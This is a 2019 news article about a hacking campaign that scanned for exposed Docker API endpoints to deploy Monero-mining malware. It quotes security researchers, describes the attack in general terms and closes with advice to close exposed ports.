A group of hackers has launched a new cryptojacking campaign on November 24, scanning as many as 59,000 IP networks to find Docker platforms that have API endpoints exposed online.
Hackers Mass-Scanning Web for Docker Platforms to Mine Cryptocurrencies https://t.co/2znBAxphwD A new hacking campaign is targeting Docker platforms that have API endpoints exposed online to mine Monero https://t.co/dUtxFPgeyq News pic.twitter.com/GHXrlZhpLp — CryptoPost (@crypto_PST) November 27, 2019
On November 26, it has been reported by ZDNet, a business technology publication, that the campaign is targeting vulnerable Docker instances in order to deploy crypto-malware to generate funds for the hacking group by mining Monero (XMR).
It has been analyzed that the mass scanning issue was first discovered by Bad Packets LLC, the American internet security firm, on November 25.
Large uptick in Docker targeted scanning activity started around midnight UTC on 2019-11-24. Payload script https://t.co/q047bRPUyj has zero detections on VirusTotal (https://t.co/AtCT4qp6qt) despite clear malicious activity. Archived copy here: https://t.co/pwpVhn4MM9 pic.twitter.com/nDOfO2bKD5 — Bad Packets Report (@bad_packets) November 25, 2019
However, Troy Mursch, the Chief Research Officer and Co-founder of Bad Packets LLC, said that exploit activity targeting exposed Docker instances is not new and happens quite often.
Docker is a developer tool designed to simplify processes of creating, deploying and running software by using containers. Containers allow developers to package up an application with all of the required parts like libraries and other dependencies and deliver it as one package.
Reportedly, a group of hackers is now scanning the internet to search for IP networks with exposed Docker platforms to mine crypto. Hackers using Docker pl…Read more: https://t.co/I19GctC9zr — webnow (@webnowcompany) November 27, 2019
Likewise, Mursch, who reportedly discovered the campaign, told that once the hacking group manages to identify an exposed host, attackers deploy the API endpoint to start an Alpine Linux OS container to run a command that downloads and runs a Bash script from the attackers’ server. That script then reportedly installs a “classic XMRRig cryptocurrency miner.”
According to Mursch, hackers mined 14.82 XMR in the two days the Docker-targeting campaign has been active, which is worth $835 at press time.
So, in order to avoid the newly detected vulnerability, Mursch recommends that users who run Docker instances immediately check if they are exposing their API endpoints on the internet, close the ports, and terminate unrecognized running containers.